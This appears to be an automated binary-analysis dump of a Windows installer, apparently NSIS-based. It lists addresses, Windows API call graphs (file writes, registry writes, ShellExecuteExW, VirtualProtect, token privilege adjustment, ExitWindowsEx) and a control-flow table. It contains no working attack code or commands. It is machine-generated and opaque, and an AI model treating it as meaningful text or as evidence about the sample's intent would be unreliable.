lstrcpyW 5164->5166 5165->5117 5166->5165 5167->5121 5533 40497d 5534 4049b3 5533->5534 5535 40498d 5533->5535 5537 40453a 8 API calls 5534->5537 5536 4044d3 23 API calls 5535->5536 5538 40499a SetDlgItemTextW 5536->5538 5539 4049bf 5537->5539 5538->5534 5540 402b7e 5541 402bd0 5540->5541 5542 402b85 5540->5542 5543 406948 5 API calls 5541->5543 5545 402da9 22 API calls 5542->5545 5546 402bce 5542->5546 5544 402bd7 5543->5544 5547 402dcb 22 API calls 5544->5547 5548 402b93 5545->5548 5549 402be0 5547->5549 5550 402da9 22 API calls 5548->5550 5549->5546 5551 402be4 IIDFromString 5549->5551 5553 402b9f 5550->5553 5551->5546 5552 402bf3 5551->5552 5552->5546 5558 406554 lstrcpynW 5552->5558 5557 40649b wsprintfW 5553->5557 5556 402c10 CoTaskMemFree 5556->5546 5557->5546 5558->5556 5559 401000 5560 401037 BeginPaint GetClientRect 5559->5560 5561 40100c DefWindowProcW 5559->5561 5562 4010f3 5560->5562 5566 401179 5561->5566 5564 401073 CreateBrushIndirect FillRect DeleteObject 5562->5564 5565 4010fc 5562->5565 5564->5562 5567 401102 CreateFontIndirectW 5565->5567 5568 401167 EndPaint 5565->5568 5567->5568 5569 401112 6 API calls 5567->5569 5568->5566 5569->5568 5570 402a80 5571 402da9 22 API calls 5570->5571 5572 402a86 5571->5572 5573 402ac9 5572->5573 5574 402aad 5572->5574 5581 402953 5572->5581 5577 402ae3 5573->5577 5578 402ad3 5573->5578 5575 402ab2 5574->5575 5576 402ac3 5574->5576 5584 406554 lstrcpynW 5575->5584 5585 40649b wsprintfW 5576->5585 5580 406591 22 API calls 5577->5580 5579 402da9 22 API calls 5578->5579 5579->5581 5580->5581 5584->5581 5585->5581 4136 401781 4142 402dcb 4136->4142 4140 40178f 4141 406073 2 API calls 4140->4141 4141->4140 4143 402dd7 4142->4143 4144 406591 22 API calls 4143->4144 4145 402df8 4144->4145 4146 401788 4145->4146 4147 406802 5 API calls 4145->4147 4148 406073 4146->4148 4147->4146 4149 406080 GetTickCount GetTempFileNameW 4148->4149 4150 4060ba 4149->4150 4151 4060b6 4149->4151 4150->4140 4151->4149 4151->4150 5586 401d82 5587 402da9 22 API calls 5586->5587 5588 401d93 SetWindowLongW 5587->5588 5589 402c4f 5588->5589 5590 6a2b23e9 5591 6a2b2453 5590->5591 5592 6a2b247d 5591->5592 5593 6a2b245e GlobalAlloc 5591->5593 5593->5591 4171 401f03 4172 402da9 22 API calls 4171->4172 4173 401f09 4172->4173 4174 402da9 22 API calls 4173->4174 4175 401f15 4174->4175 4176 401f21 ShowWindow 4175->4176 4177 401f2c EnableWindow 4175->4177 4178 402c4f 4176->4178 4177->4178 5594 401503 5595 401508 5594->5595 5597 40152e 5594->5597 5596 402da9 22 API calls 5595->5596 5596->5597 5598 402903 5599 40290b 5598->5599 5600 40290f FindNextFileW 5599->5600 5603 402921 5599->5603 5601 402968 5600->5601 5600->5603 5604 406554 lstrcpynW 5601->5604 5604->5603 5605 401588 5606 402bc9 5605->5606 5609 40649b wsprintfW 5606->5609 5608 402bce 5609->5608 5610 404609 lstrcpynW lstrlenW 5611 6a2b10e1 5612 6a2b1111 5611->5612 5613 6a2b12b0 GlobalFree 5612->5613 5614 6a2b11d7 GlobalAlloc 5612->5614 5615 6a2b1240 GlobalFree 5612->5615 5616 6a2b135a 2 API calls 5612->5616 5617 6a2b12ab 5612->5617 5618 6a2b1312 2 API calls 5612->5618 5619 6a2b129a GlobalFree 5612->5619 5620 6a2b116b GlobalAlloc 5612->5620 5621 6a2b1381 lstrcpyW 5612->5621 5614->5612 5615->5612 5616->5612 5617->5613 5618->5612 5619->5612 5620->5612 5621->5612 5622 40198d 5623 402da9 22 API calls 5622->5623 5624 401994 5623->5624 5625 402da9 22 API calls 5624->5625 5626 4019a1 5625->5626 5627 402dcb 22 API calls 5626->5627 5628 4019b8 lstrlenW 5627->5628 5629 4019c9 5628->5629 5630 401a0a 5629->5630 5634 406554 lstrcpynW 5629->5634 5632 4019fa 5632->5630 5633 4019ff lstrlenW 5632->5633 5633->5630 5634->5632 5635 40168f 5636 402dcb 22 API calls 5635->5636 5637 401695 5636->5637 5638 4068b1 2 API calls 5637->5638 5639 40169b 5638->5639 5640 402b10 5641 402da9 22 API calls 5640->5641 5644 402b16 5641->5644 5642 406591 22 API calls 5643 402953 5642->5643 5644->5642 5644->5643 4253 402711 4254 402da9 22 API calls 4253->4254 4255 402720 4254->4255 4256 40276a ReadFile 4255->4256 4258 402803 4255->4258 4259 4027aa MultiByteToWideChar 4255->4259 4260 40285f 4255->4260 4263 4027d0 SetFilePointer MultiByteToWideChar 4255->4263 4264 402870 4255->4264 4266 40285d 4255->4266 4276 4060c7 ReadFile 4255->4276 4256->4255 4256->4266 4258->4255 4258->4266 4267 406125 SetFilePointer 4258->4267 4259->4255 4278 40649b wsprintfW 4260->4278 4263->4255 4265 402891 SetFilePointer 4264->4265 4264->4266 4265->4266 4268 406141 4267->4268 4271 406159 4267->4271 4269 4060c7 ReadFile 4268->4269 4270 40614d 4269->4270 4270->4271 4272 406162 SetFilePointer 4270->4272 4273 40618a SetFilePointer 4270->4273 4271->4258 4272->4273 4274 40616d 4272->4274 4273->4271 4279 4060f6 WriteFile 4274->4279 4277 4060e5 4276->4277 4277->4255 4278->4266 4280 406114 4279->4280 4280->4271 5645 401491 5646 4055d9 29 API calls 5645->5646 5647 401498 5646->5647 5648 404692 5649 4046aa 5648->5649 5656 4047c4 5648->5656 5653 4044d3 23 API calls 5649->5653 5650 40482e 5651 4048f8 5650->5651 5652 404838 GetDlgItem 5650->5652 5659 40453a 8 API calls 5651->5659 5654 404852 5652->5654 5655 4048b9 5652->5655 5658 404711 5653->5658 5654->5655 5662 404878 SendMessageW LoadCursorW SetCursor 5654->5662 5655->5651 5663 4048cb 5655->5663 5656->5650 5656->5651 5657 4047ff GetDlgItem SendMessageW 5656->5657 5681 4044f5 KiUserCallbackDispatcher 5657->5681 5661 4044d3 23 API calls 5658->5661 5669 4048f3 5659->5669 5665 40471e CheckDlgButton 5661->5665 5682 404941 5662->5682 5667 4048e1 5663->5667 5668 4048d1 SendMessageW 5663->5668 5664 404829 5671 40491d SendMessageW 5664->5671 5679 4044f5 KiUserCallbackDispatcher 5665->5679 5667->5669 5670 4048e7 SendMessageW 5667->5670 5668->5667 5670->5669 5671->5650 5674 40473c GetDlgItem 5680 404508 SendMessageW 5674->5680 5676 404752 SendMessageW 5677 404778 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5676->5677 5678 40476f GetSysColor 5676->5678 5677->5669 5678->5677 5679->5674 5680->5676 5681->5664 5685 405b7a ShellExecuteExW 5682->5685 5684 4048a7 LoadCursorW SetCursor 5684->5655 5685->5684 5686 6a2b1979 5687 6a2b199c 5686->5687 5688 6a2b19d1 GlobalFree 5687->5688 5689 6a2b19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5687->5689 5688->5689 5690 6a2b1312 2 API calls 5689->5690 5691 6a2b1b6e GlobalFree GlobalFree 5690->5691 4390 6a2b2a7f 4391 6a2b2acf 4390->4391 4392 6a2b2a8f VirtualProtect 4390->4392 4392->4391 4393 401794 4394 402dcb 22 API calls 4393->4394 4395 40179b 4394->4395 4396 4017c3 4395->4396 4397 4017bb 4395->4397 4454 406554 lstrcpynW 4396->4454 4453 406554 lstrcpynW 4397->4453 4400 4017c1 4404 406802 5 API calls 4400->4404 4401 4017ce 4455 405e23 lstrlenW CharPrevW 4401->4455 4422 4017e0 4404->4422 4405 40181c 4461 40601f GetFileAttributesW 4405->4461 4409 4017f2 CompareFileTime 4409->4422 4410 4018b2 4411 4055d9 29 API calls 4410->4411 4414 4018bc 4411->4414 4412 4055d9 29 API calls 4421 40189e 4412->4421 4413 406554 lstrcpynW 4413->4422 4433 4032d9 4414->4433 4417 4018e3 SetFileTime 4418 4018f5 CloseHandle 4417->4418 4420 401906 4418->4420 4418->4421 4419 406591 22 API calls 4419->4422 4423 40190b 4420->4423 4424 40191e 4420->4424 4422->4405 4422->4409 4422->4410 4422->4413 4422->4419 4429 405bb4 MessageBoxIndirectW 4422->4429 4430 401889 4422->4430 4432 406044 GetFileAttributesW CreateFileW 4422->4432 4458 4068b1 FindFirstFileW 4422->4458 4425 406591 22 API calls 4423->4425 4426 406591 22 API calls 4424->4426 4427 401913 lstrcatW 4425->4427 4428 401926 4426->4428 4427->4428 4428->4421 4431 405bb4 MessageBoxIndirectW 4428->4431 4429->4422 4430->4412 4430->4421 4431->4421 4432->4422 4435 4032f2 4433->4435 4434 403320 4464 4034d1 4434->4464 4435->4434 4467 4034e7 SetFilePointer 4435->4467 4439 40346a 4441 4034ac 4439->4441 4446 40346e 4439->4446 4440 40333d GetTickCount 4442 4018cf 4440->4442 4449 403369 4440->4449 4443 4034d1 ReadFile 4441->4443 4442->4417 4442->4418 4443->4442 4444 4034d1 ReadFile 4444->4449 4445 4034d1 ReadFile 4445->4446 4446->4442 4446->4445 4447 4060f6 WriteFile 4446->4447 4447->4446 4448 4033bf GetTickCount 4448->4449 4449->4442 4449->4444 4449->4448 4450 4033e4 MulDiv wsprintfW 4449->4450 4452 4060f6 WriteFile 4449->4452 4451 4055d9 29 API calls 4450->4451 4451->4449 4452->4449 4453->4400 4454->4401 4456 4017d4 lstrcatW 4455->4456 4457 405e3f lstrcatW 4455->4457 4456->4400 4457->4456 4459 4068d2 4458->4459 4460 4068c7 FindClose 4458->4460 4459->4422 4460->4459 4462 406031 SetFileAttributesW 4461->4462 4463 40603e 4461->4463 4462->4463 4463->4422 4465 4060c7 ReadFile 4464->4465 4466 40332b 4465->4466 4466->4439 4466->4440 4466->4442 4467->4434 5692 401a97 5693 402da9 22 API calls 5692->5693 5694 401aa0 5693->5694 5695 402da9 22 API calls 5694->5695 5696 401a45 5695->5696 4483 405718 4484 4058c2 4483->4484 4485 405739 GetDlgItem GetDlgItem GetDlgItem 4483->4485 4487 4058f3 4484->4487 4488 4058cb GetDlgItem CreateThread CloseHandle 4484->4488 4529 404508 SendMessageW 4485->4529 4490 40591e 4487->4490 4491 405943 4487->4491 4492 40590a ShowWindow ShowWindow 4487->4492 4488->4487 4532 4056ac OleInitialize 4488->4532 4489 4057a9 4497 4057b0 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4489->4497 4493 40592a 4490->4493 4498 40597e 4490->4498 4496 40453a 8 API calls 4491->4496 4531 404508 SendMessageW 4492->4531 4494 405932 4493->4494 4495 405958 ShowWindow 4493->4495 4500 4044ac SendMessageW 4494->4500 4502 405978 4495->4502 4503 40596a 4495->4503 4501 405951 4496->4501 4504 405802 SendMessageW SendMessageW 4497->4504 4505 40581e 4497->4505 4498->4491 4506 40598c SendMessageW 4498->4506 4500->4491 4508 4044ac SendMessageW 4502->4508 4507 4055d9 29 API calls 4503->4507 4504->4505 4509 405831 4505->4509 4510 405823 SendMessageW 4505->4510 4506->4501 4511 4059a5 CreatePopupMenu 4506->4511 4507->4502 4508->4498 4513 4044d3 23 API calls 4509->4513 4510->4509 4512 406591 22 API calls 4511->4512 4515 4059b5 AppendMenuW 4512->4515 4514 405841 4513->4514 4518 40584a ShowWindow 4514->4518 4519 40587e GetDlgItem SendMessageW 4514->4519 4516 4059d2 GetWindowRect 4515->4516 4517 4059e5 TrackPopupMenu 4515->4517 4516->4517 4517->4501 4520 405a00 4517->4520 4521 405860 ShowWindow 4518->4521 4522 40586d 4518->4522 4519->4501 4523 4058a5 SendMessageW SendMessageW 4519->4523 4524 405a1c SendMessageW 4520->4524 4521->4522 4530 404508 SendMessageW 4522->4530 4523->4501 4524->4524 4525 405a39 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4524->4525 4527 405a5e SendMessageW 4525->4527 4527->4527 4528 405a87 GlobalUnlock SetClipboardData CloseClipboard 4527->4528 4528->4501 4529->4489 4530->4519 4531->4490 4533 40451f SendMessageW 4532->4533 4536 4056cf 4533->4536 4534 4056f6 4535 40451f SendMessageW 4534->4535 4537 405708 OleUninitialize 4535->4537 4536->4534 4538 401389 2 API calls 4536->4538 4538->4536 4539 401598 4540 4015b1 4539->4540 4541 4015a8 ShowWindow 4539->4541 4542 402c4f 4540->4542 4543 4015bf ShowWindow 4540->4543 4541->4540 4543->4542 4544 402419 4545 402dcb 22 API calls 4544->4545 4546 402428 4545->4546 4547 402dcb 22 API calls 4546->4547 4548 402431 4547->4548 4549 402dcb 22 API calls 4548->4549 4550 40243b GetPrivateProfileStringW 4549->4550 5697 404d1a 5698 404d46 5697->5698 5699 404d2a 5697->5699 5701 404d79 5698->5701 5702 404d4c SHGetPathFromIDListW 5698->5702 5708 405b98 GetDlgItemTextW 5699->5708 5704 404d63 SendMessageW 5702->5704 5705 404d5c 5702->5705 5703 404d37 SendMessageW 5703->5698 5704->5701 5707 40140b 2 API calls 5705->5707 5707->5704 5708->5703 5709 40201b 5710 402dcb 22 API calls 5709->5710 5711 402022 5710->5711 5712 4068b1 2 API calls 5711->5712 5713 402028 5712->5713 5715 402039 5713->5715 5716 40649b wsprintfW 5713->5716 5716->5715 5717 401b9c 5718 402dcb 22 API calls 5717->5718 5719 401ba3 5718->5719 5720 402da9 22 API calls 5719->5720 5721 401bac wsprintfW 5720->5721 5722 402c4f 5721->5722 5723 40149e 5724 4023c2 5723->5724 5725 4014ac PostQuitMessage 5723->5725 5725->5724 5726 6a2b1774 5727 6a2b17a3 5726->5727 5728 6a2b1bff 22 API calls 5727->5728 5729 6a2b17aa 5728->5729 5730 6a2b17bd 5729->5730 5731 6a2b17b1 5729->5731 5733 6a2b17c7 5730->5733 5734 6a2b17e4 5730->5734 5732 6a2b1312 2 API calls 5731->5732 5737 6a2b17bb 5732->5737 5738 6a2b15dd 3 API calls 5733->5738 5735 6a2b17ea 5734->5735 5736 6a2b180e 5734->5736 5739 6a2b1654 3 API calls 5735->5739 5740 6a2b15dd 3 API calls 5736->5740 5741 6a2b17cc 5738->5741 5742 6a2b17ef 5739->5742 5740->5737 5743 6a2b1654 3 API calls 5741->5743 5745 6a2b1312 2 API calls 5742->5745 5744 6a2b17d2 5743->5744 5746 6a2b1312 2 API calls 5744->5746 5747 6a2b17f5 GlobalFree 5745->5747 5748 6a2b17d8 GlobalFree 5746->5748 5747->5737 5749 6a2b1809 GlobalFree 5747->5749 5748->5737 5749->5737 5750 4016a0 5751 402dcb 22 API calls 5750->5751 5752 4016a7 5751->5752 5753 402dcb 22 API calls 5752->5753 5754 4016b0 5753->5754 5755 402dcb 22 API calls 5754->5755 5756 4016b9 MoveFileW 5755->5756 5757 4016c5 5756->5757 5758 4016cc 5756->5758 5760 401423 29 API calls 5757->5760 5759 4068b1 2 API calls 5758->5759 5762 40231b 5758->5762 5761 4016db 5759->5761 5760->5762 5761->5762 5763 406314 41 API calls 5761->5763 5763->5757 5764 401a24 5765 402dcb 22 API calls 5764->5765 5766 401a2b 5765->5766 5767 402dcb 22 API calls 5766->5767 5768 401a34 5767->5768 5769 401a3b lstrcmpiW 5768->5769 5770 401a4d lstrcmpW 5768->5770 5771 401a41 5769->5771 5770->5771 5772 402324 5773 402dcb 22 API calls 5772->5773 5774 40232a 5773->5774 5775 402dcb 22 API calls 5774->5775 5776 402333 5775->5776 5777 402dcb 22 API calls 5776->5777 5778 40233c 5777->5778 5779 4068b1 2 API calls 5778->5779 5780 402345 5779->5780 5781 402356 lstrlenW lstrlenW 5780->5781 5782 402349 5780->5782 5784 4055d9 29 API calls 5781->5784 5783 4055d9 29 API calls 5782->5783 5786 402351 5782->5786 5783->5786 5785 402394 SHFileOperationW 5784->5785 5785->5782 5785->5786 5787 401da6 5788 401db9 GetDlgItem 5787->5788 5789 401dac 5787->5789 5791 401db3 5788->5791 5790 402da9 22 API calls 5789->5790 5790->5791 5792 402dcb 22 API calls 5791->5792 5794 401dfa GetClientRect LoadImageW SendMessageW 5791->5794 5792->5794 5795 401e58 5794->5795 5797 401e64 5794->5797 5796 401e5d DeleteObject 5795->5796 5795->5797 5796->5797 5798 6a2b2d43 5799 6a2b2d5b 5798->5799 5800 6a2b162f 2 API calls 5799->5800 5801 6a2b2d76 5800->5801 5802 4023a8 5803 4023c2 5802->5803 5804 4023af 5802->5804 5805 406591 22 API calls 5804->5805 5806 4023bc 5805->5806 5806->5803 5807 405bb4 MessageBoxIndirectW 5806->5807 5807->5803 5808 402c2a SendMessageW 5809 402c44 InvalidateRect 5808->5809 5810 402c4f 5808->5810 5809->5810 4702 40352f SetErrorMode GetVersionExW 4703 403583 GetVersionExW 4702->4703 4704 4035bb 4702->4704 4703->4704 4705 403612 4704->4705 4706 406948 5 API calls 4704->4706 4707 4068d8 3 API calls 4705->4707 4706->4705 4708 403628 lstrlenA 4707->4708 4708->4705 4709 403638 4708->4709 4710 406948 5 API calls 4709->4710 4711 40363f 4710->4711 4712 406948 5 API calls 4711->4712 4713 403646 4712->4713 4714 406948 5 API calls 4713->4714 4715 403652 #17 OleInitialize SHGetFileInfoW 4714->4715 4790 406554 lstrcpynW 4715->4790 4718 4036a1 GetCommandLineW 4791 406554 lstrcpynW 4718->4791 4720 4036b3 4721 405e50 CharNextW 4720->4721 4722 4036d9 CharNextW 4721->4722 4727 4036eb 4722->4727 4723 4037ed 4724 403801 GetTempPathW 4723->4724 4792 4034fe 4724->4792 4726 403819 4728 403873 DeleteFileW 4726->4728 4729 40381d GetWindowsDirectoryW lstrcatW 4726->4729 4727->4723 4730 405e50 CharNextW 4727->4730 4736 4037ef 4727->4736 4802 4030a2 GetTickCount GetModuleFileNameW 4728->4802 4731 4034fe 12 API calls 4729->4731 4730->4727 4733 403839 4731->4733 4733->4728 4735 40383d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4733->4735 4734 403887 4740 405e50 CharNextW 4734->4740 4746 40393e 4734->4746 4773 40392e 4734->4773 4738 4034fe 12 API calls 4735->4738 4886 406554 lstrcpynW 4736->4886 4742 40386b 4738->4742 4756 4038a6 4740->4756 4742->4728 4742->4746 4744 403ab0 4748 403b34 ExitProcess 4744->4748 4749 403ab8 GetCurrentProcess OpenProcessToken 4744->4749 4745 403a8c 4747 405bb4 MessageBoxIndirectW 4745->4747 4891 403b4c 4746->4891 4751 403a9a ExitProcess 4747->4751 4752 403ad0 LookupPrivilegeValueW AdjustTokenPrivileges 4749->4752 4753 403b04 4749->4753 4752->4753 4758 406948 5 API calls 4753->4758 4754 403904 4759 405f2b 18 API calls 4754->4759 4755 403947 4757 405b1f 5 API calls 4755->4757 4756->4754 4756->4755 4760 40394c lstrlenW 4757->4760 4761 403b0b 4758->4761 4762 403910 4759->4762 4889 406554 lstrcpynW 4760->4889 4764 403b20 ExitWindowsEx 4761->4764 4766 403b2d 4761->4766 4762->4746 4887 406554 lstrcpynW 4762->4887 4764->4748 4764->4766 4765 403966 4768 40397e 4765->4768 4890 406554 lstrcpynW 4765->4890 4769 40140b 2 API calls 4766->4769 4774 4039a4 wsprintfW 4768->4774 4788 4039d0 4768->4788 4769->4748 4770 403923 4888 406554 lstrcpynW 4770->4888 4830 403c26 4773->4830 4775 406591 22 API calls 4774->4775 4775->4768 4776 405aa8 2 API calls 4776->4788 4777 405b02 2 API calls 4777->4788 4778 4039e0 GetFileAttributesW 4780 4039ec DeleteFileW 4778->4780 4778->4788 4779 403a1a SetCurrentDirectoryW 4781 406314 41 API calls 4779->4781 4780->4788 4782 403a29 CopyFileW 4781->4782 4782->4746 4782->4788 4783 405c60 72 API calls 4783->4788 4784 406314 41 API calls 4784->4788 4785 406591 22 API calls 4785->4788 4786 405b37 2 API calls 4786->4788 4787 403aa2 CloseHandle 4787->4746 4788->4746 4788->4768 4788->4774 4788->4776 4788->4777 4788->4778 4788->4779 4788->4783 4788->4784 4788->4785 4788->4786 4788->4787 4789 4068b1 2 API calls 4788->4789 4789->4788 4790->4718 4791->4720 4793 406802 5 API calls 4792->4793 4795 40350a 4793->4795 4794 403514 4794->4726 4795->4794 4796 405e23 3 API calls 4795->4796 4797 40351c 4796->4797 4798 405b02 2 API calls 4797->4798 4799 403522 4798->4799 4800 406073 2 API calls 4799->4800 4801 40352d 4800->4801 4801->4726 4898 406044 GetFileAttributesW CreateFileW 4802->4898 4804 4030e2 4829 4030f2 4804->4829 4899 406554 lstrcpynW 4804->4899 4806 403108 4807 405e6f 2 API calls 4806->4807 4808 40310e 4807->4808 4900 406554 lstrcpynW 4808->4900 4810 403119 GetFileSize 4825 403213 4810->4825 4828 403130 4810->4828 4812 40321c 4814 40324c GlobalAlloc 4812->4814 4812->4829 4913 4034e7 SetFilePointer 4812->4913 4813 4034d1 ReadFile 4813->4828 4912 4034e7 SetFilePointer 4814->4912 4816 40327f 4819 40303e 6 API calls 4816->4819 4818 403267 4821 4032d9 36 API calls 4818->4821 4819->4829 4820 403235 4822 4034d1 ReadFile 4820->4822 4826 403273 4821->4826 4823 403240 4822->4823 4823->4814 4823->4829 4824 40303e 6 API calls 4824->4828 4901 40303e 4825->4901 4826->4826 4827 4032b0 SetFilePointer 4826->4827 4826->4829 4827->4829 4828->4813 4828->4816 4828->4824 4828->4825 4828->4829 4829->4734 4831 406948 5 API calls 4830->4831 4832 403c3a 4831->4832 4833 403c40 4832->4833 4834 403c52 4832->4834 4922 40649b wsprintfW 4833->4922 4835 406422 3 API calls 4834->4835 4836 403c82 4835->4836 4837 403ca1 lstrcatW 4836->4837 4839 406422 3 API calls 4836->4839 4840 403c50 4837->4840 4839->4837 4914 403efc 4840->4914 4843 405f2b 18 API calls 4844 403cd3 4843->4844 4845 403d67 4844->4845 4847 406422 3 API calls 4844->4847 4846 405f2b 18 API calls 4845->4846 4848 403d6d 4846->4848 4856 403d05 4847->4856 4849 403d7d LoadImageW 4848->4849 4852 406591 22 API calls 4848->4852 4850 403e23 4849->4850 4851 403da4 RegisterClassW 4849->4851 4854 40140b 2 API calls 4850->4854 4853 403dda SystemParametersInfoW CreateWindowExW 4851->4853 4885 403e2d 4851->4885 4852->4849 4853->4850 4859 403e29 4854->4859 4855 403d26 lstrlenW 4857 403d34 lstrcmpiW 4855->4857 4858 403d5a 4855->4858 4856->4845 4856->4855 4860 405e50 CharNextW 4856->4860 4857->4858 4861 403d44 GetFileAttributesW 4857->4861 4862 405e23 3 API calls 4858->4862 4865 403efc 23 API calls 4859->4865 4859->4885 4863 403d23 4860->4863 4864 403d50 4861->4864 4866 403d60 4862->4866 4863->4855 4864->4858 4867 405e6f 2 API calls 4864->4867 4868 403e3a 4865->4868 4923 406554 lstrcpynW 4866->4923 4867->4858 4870 403e46 ShowWindow 4868->4870 4871 403ec9 4868->4871 4873 4068d8 3 API calls 4870->4873 4872 4056ac 5 API calls 4871->4872 4874 403ecf 4872->4874 4875 403e5e 4873->4875 4876 403ed3 4874->4876 4877 403eeb 4874->4877 4878 403e6c GetClassInfoW 4875->4878 4880 4068d8 3 API calls 4875->4880 4884 40140b 2 API calls 4876->4884 4876->4885 4879 40140b 2 API calls 4877->4879 4881 403e80 GetClassInfoW RegisterClassW 4878->4881 4882 403e96 DialogBoxParamW 4878->4882 4879->4885 4880->4878 4881->4882 4883 40140b 2 API calls 4882->4883 4883->4885 4884->4885 4885->4746 4886->4724 4887->4770 4888->4773 4889->4765 4890->4768 4892 403b64 4891->4892 4893 403b56 CloseHandle 4891->4893 4925 403b91 4892->4925 4893->4892 4896 405c60 72 API calls 4897 403a7f OleUninitialize 4896->4897 4897->4744 4897->4745 4898->4804 4899->4806 4900->4810 4902 403047 4901->4902 4903 40305f 4901->4903 4904 403050 DestroyWindow 4902->4904 4905 403057 4902->4905 4906 403067 4903->4906 4907 40306f GetTickCount 4903->4907 4904->4905 4905->4812 4908 406984 2 API calls 4906->4908 4909 4030a0 4907->4909 4910 40307d CreateDialogParamW ShowWindow 4907->4910 4911 40306d 4908->4911 4909->4812 4910->4909 4911->4812 4912->4818 4913->4820 4915 403f10 4914->4915 4924 40649b wsprintfW 4915->4924 4917 403f81 4918 403fb5 23 API calls 4917->4918 4920 403f86 4918->4920 4919 403cb1 4919->4843 4920->4919 4921 406591 22 API calls 4920->4921 4921->4920 4922->4840 4923->4845 4924->4917 4926 403b9f 4925->4926 4927 403ba4 FreeLibrary GlobalFree 4926->4927 4928 403b69 4926->4928 4927->4927 4927->4928 4928->4896 4929 4024af 4930 402dcb 22 API calls 4929->4930 4931 4024c1 4930->4931 4932 402dcb 22 API calls 4931->4932 4933 4024cb 4932->4933 4946 402e5b 4933->4946 4936 402c4f 4937 402503 4939 40250f 4937->4939 4941 402da9 22 API calls 4937->4941 4938 402dcb 22 API calls 4940 4024f9 lstrlenW 4938->4940 4942 40252e RegSetValueExW 4939->4942 4943 4032d9 36 API calls 4939->4943 4940->4937 4941->4939 4944 402544 RegCloseKey 4942->4944 4943->4942 4944->4936 4947 402e76 4946->4947 4950 4063ef 4947->4950 4951 4063fe 4950->4951 4952 4024db 4951->4952 4953 406409 RegCreateKeyExW 4951->4953 4952->4936 4952->4937 4952->4938 4953->4952 4954 402930 4955 402dcb 22 API calls 4954->4955 4956 402937 FindFirstFileW 4955->4956 4957 40295f 4956->4957 4961 40294a 4956->4961 4958 402968 4957->4958 4962 40649b wsprintfW 4957->4962 4963 406554 lstrcpynW 4958->4963 4962->4958 4963->4961 5811 401931 5812 401968 5811->5812 5813 402dcb 22 API calls 5812->5813 5814 40196d 5813->5814 5815 405c60 72 API calls 5814->5815 5816 401976 5815->5816 5817 6a2b1058 5820 6a2b1074 5817->5820 5818 6a2b10dd 5819 6a2b1092 5822 6a2b15b6 GlobalFree 5819->5822 5820->5818 5820->5819 5821 6a2b15b6 GlobalFree 5820->5821 5821->5819 5823 6a2b10a2 5822->5823 5824 6a2b10a9 GlobalSize 5823->5824 5825 6a2b10b2 5823->5825 5824->5825 5826 6a2b10c7 5825->5826 5827 6a2b10b6 GlobalAlloc 5825->5827 5829 6a2b10d2 GlobalFree 5826->5829 5828 6a2b15dd 3 API calls 5827->5828 5828->5826 5829->5818 5830 401934 5831 402dcb 22 API calls 5830->5831 5832 40193b 5831->5832 5833 405bb4 MessageBoxIndirectW 5832->5833 5834 401944 5833->5834 4964 4028b6 4965 4028bd 4964->4965 4966 402bce 4964->4966 4967 402da9 22 API calls 4965->4967 4968 4028c4 4967->4968 4969 4028d3 SetFilePointer 4968->4969 4969->4966 4970 4028e3 4969->4970 4972 40649b wsprintfW 4970->4972 4972->4966 5835 401f37 5836 402dcb 22 API calls 5835->5836 5837 401f3d 5836->5837 5838 402dcb 22 API calls 5837->5838 5839 401f46 5838->5839 5840 402dcb 22 API calls 5839->5840 5841 401f4f 5840->5841 5842 402dcb 22 API calls 5841->5842 5843 401f58 5842->5843 5844 401423 29 API calls 5843->5844 5845 401f5f 5844->5845 5852 405b7a ShellExecuteExW 5845->5852 5847 401fa7 5848 4069f3 5 API calls 5847->5848 5850 402953 5847->5850 5849 401fc4 CloseHandle 5848->5849 5849->5850 5852->5847 5853 4014b8 5854 4014be 5853->5854 5855 401389 2 API calls 5854->5855 5856 4014c6 5855->5856 5857 402fb8 5858 402fe3 5857->5858 5859 402fca SetTimer 5857->5859 5860 403038 5858->5860 5861 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5858->5861 5859->5858 5861->5860 5862 401d3c 5863 402da9 22 API calls 5862->5863 5864 401d42 IsWindow 5863->5864 5865 401a45 5864->5865

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40352f-403581 SetErrorMode GetVersionExW 1 403583-4035b3 GetVersionExW 0->1 2 4035bb-4035c0 0->2 1->2 3 4035c2 2->3 4 4035c8-40360a 2->4 3->4 5 40360c-403614 call 406948 4->5 6 40361d 4->6 5->6 11 403616 5->11 7 403622-403636 call 4068d8 lstrlenA 6->7 13 403638-403654 call 406948 * 3 7->13 11->6 20 403665-4036c9 #17 OleInitialize SHGetFileInfoW call 406554 GetCommandLineW call 406554 13->20 21 403656-40365c 13->21 28 4036d2-4036e6 call 405e50 CharNextW 20->28 29 4036cb-4036cd 20->29 21->20 25 40365e 21->25 25->20 32 4037e1-4037e7 28->32 29->28 33 4036eb-4036f1 32->33 34 4037ed 32->34 36 4036f3-4036f8 33->36 37 4036fa-403701 33->37 35 403801-40381b GetTempPathW call 4034fe 34->35 46 403873-40388d DeleteFileW call 4030a2 35->46 47 40381d-40383b GetWindowsDirectoryW lstrcatW call 4034fe 35->47 36->36 36->37 39 403703-403708 37->39 40 403709-40370d 37->40 39->40 41 403713-403719 40->41 42 4037ce-4037dd call 405e50 40->42 44 403733-40376c 41->44 45 40371b-403722 41->45 42->32 61 4037df-4037e0 42->61 51 403789-4037c3 44->51 52 40376e-403773 44->52 49 403724-403727 45->49 50 403729 45->50 62 403893-403899 46->62 63 403a7a-403a8a call 403b4c OleUninitialize 46->63 47->46 66 40383d-40386d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fe 47->66 49->44 49->50 50->44 58 4037c5-4037c9 51->58 59 4037cb-4037cd 51->59 52->51 56 403775-40377d 52->56 64 403784 56->64 65 40377f-403782 56->65 58->59 67 4037ef-4037fc call 406554 58->67 59->42 61->32 68 403932-403939 call 403c26 62->68 69 40389f-4038aa call 405e50 62->69 77 403ab0-403ab6 63->77 78 403a8c-403a9c call 405bb4 ExitProcess 63->78 64->51 65->51 65->64 66->46 66->63 67->35 80 40393e-403942 68->80 82 4038f8-403902 69->82 83 4038ac-4038e1 69->83 84 403b34-403b3c 77->84 85 403ab8-403ace GetCurrentProcess OpenProcessToken 77->85 80->63 92 403904-403912 call 405f2b 82->92 93 403947-40396d call 405b1f lstrlenW call 406554 82->93 89 4038e3-4038e7 83->89 86 403b42-403b46 